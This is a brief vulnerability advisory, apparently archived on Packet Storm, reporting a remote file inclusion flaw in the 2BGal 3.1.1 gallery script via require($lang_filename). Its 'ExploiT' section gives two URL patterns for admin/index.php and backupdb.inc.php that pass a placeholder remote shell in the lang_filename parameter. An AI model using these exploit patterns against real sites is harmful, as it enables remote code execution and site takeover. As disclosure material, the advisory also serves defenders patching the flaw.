2BGal version 3.1.1 suffers from a remote file inclusion vulnerability.
4fc4f22a82230081310b7df20ef2e59e381445e20cfd8329c23904ef5b3d2fa7=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability
Script: 2BGal
Version: 3.1.1
Download: http://www.ben3w.com/multimedia/2bgal.zip
Discover: BorN To K!LL
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
Bug in:
admin/index.php & backupdb.inc.php ...... and so on >>
Code:
require($lang_filename);
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
ExploiT:
~~~~~
wWw.site.cOm/[path]/admin/index.php?lang_filename=[ BorN-SHell ]
wWw.site.cOm/[path]/admin/backupdb.inc.php?lang_filename=[ BorN-SHell ]
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
GreeTz 2:
str0ke - Dr.2 - AsbMay ....
AsbMay's Group & Kuwait Security
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed